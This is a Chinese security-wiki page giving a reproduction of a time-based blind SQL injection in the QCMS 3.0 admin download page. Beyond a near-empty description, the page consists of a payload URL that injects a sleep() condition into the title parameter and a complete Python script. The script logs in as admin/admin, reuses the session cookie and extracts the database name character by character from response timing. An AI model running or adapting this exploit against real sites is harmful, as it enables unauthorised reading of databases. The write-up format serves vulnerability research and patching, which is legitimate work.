menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 109-QCMS chevron_right 002-QCMS 3.0 sql注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    002-QCMS 3.0 sql注入漏洞.md
    1.47 KB / 2021-07-17 00:01:30
        # QCMS 3.0 sql注入漏洞
    
    ### 一、漏洞简介
    
    ### 二、漏洞影响
    
    QCMS 3.0
    
    ### 三、复现过程
    
    在后台下载管理处
    
    ![](images/15893372289437.png)
    
    
    构造payload
    
    
    ```bash
    http://url/backend/down.html?title=1';select if(ascii(substr((select database()), 1, 1))-113, 1, sleep(5));%23
    ```
    
    这里直接附上简单脚本
    
    
    ```python
    # !/usr/bin/python3
    # -*- coding:utf-8 -*-
    # author: Forthrglory
    import requests
    
    def getCookie():
        url = 'http://127.0.0.1/admin.php'
        data = {
            'username':'admin',
            'password':'admin'
        }
    
        session = requests.session()
        res = session.post(url, data)
    
        return requests.utils.dict_from_cookiejar(res.cookies)
    
    def getDatabase(url, arr, cookies):
    
        str = ''
        requests.session()
    
        for i in range(1, 11):
            for j in arr:
                data = url + '?title=1\';select if(ascii(substr((select database()), %s, 1))-%s, 1, sleep(5));%%23' % (i, ord(j))
                # print(data)
                res = requests.get(url=data, cookies=cookies)
                # print(res.elapsed.total_seconds())
                if(res.elapsed.total_seconds() > 5):
                    str += j
                    print(str)
                    break
        print('database=' + str)
    
    
    if __name__ == '__main__':
        url = 'http://127.0.0.1/backend/down.html'
        arr = []
    
        for i in range(48, 123):
            arr.append(chr(i))
    
        cookies = getCookie()
        print(cookies)
        getDatabase(url, arr, cookies)
    ```
    
    参考链接
    
    https://xz.aliyun.com/t/7269
    
    links
    file_download